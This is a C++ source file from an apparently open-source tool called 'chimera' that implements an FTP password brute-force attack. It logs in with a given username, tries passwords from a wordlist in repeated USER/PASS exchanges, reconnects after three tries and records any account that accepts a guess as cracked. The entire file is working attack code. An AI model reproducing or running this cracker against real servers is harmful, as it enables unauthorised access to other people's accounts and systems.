/***************************************************************************
 *  service-ftp.cc : This file is part of 'chimera'
 *
 *  (c) 2004 by Lukasz Tomicki <tomicki@o2.pl>
 *
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */																										

#include "CServiceAttack.h"

using namespace std;

int CServiceAttack::service_ftp(thread_data *pData)
{
	if (!pData->user)
		return 0;
	
	SOCKET sock = init_connection(pData);
	uint guess_n(0);
	bool passwd_used(1);
	char buffer1[256];
	while (pData->state == WORKING) {
		if (!sock) {
			sock = init_connection(pData);
			guess_n = 0;
			continue;
		}
		
		char buffer2[256];
		memset(buffer2, 0, 256);
		
		if (!guess_n)
			if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
				close(sock);
				adjust_connections(pData);
				return 0;
			}
			
		sprintf(buffer2, "USER %s\n", pData->user);
		sendAll(sock, pData->ssl, buffer2, strlen(buffer2), 0, std_timeout);
		memset(buffer2, 0, 256);
			
		if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
			close(sock);
			adjust_connections(pData);
			return 0;
		}
		
		if (buffer2[0] != '3') {
			if (buffer2[0] != '4') {
				pData->state = DONE;
			}
			close(sock);
			sock = 0;
			continue;
		}
		
		if (passwd_used) {
			pthread_mutex_t passwd_mutex = PTHREAD_MUTEX_INITIALIZER;
			pthread_mutex_lock(&passwd_mutex);
			const char *passwd_name = get_next_passwd(pData);
	
			if (!passwd_name) {
				pData->state = DONE;
				pthread_mutex_unlock(&passwd_mutex);
				continue;
			}
			
			strncpy(buffer1, passwd_name, 256);
			pthread_mutex_unlock(&passwd_mutex);
			passwd_used = 0;
		}
		
		sprintf(buffer2, "PASS %s\n", buffer1);
		output(MSG_VERBOSE, "trying passwd, try #%d: %s\n", guess_n + 1, buffer1);
		sendAll(sock, pData->ssl, buffer2, strlen(buffer2), 0, std_timeout);
		memset(buffer2, 0, 256);
		
		if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
			close(sock);
			sock = 0;
			continue;
		}
		
		if (buffer2[0] == '2')
			account_cracked(pData, buffer1);
		
		passwd_used = true;
		++guess_n;
		
		if (guess_n > 2) {
			close(sock);
			sock = 0;
		}
	}
	close(sock);
	return 0;
}
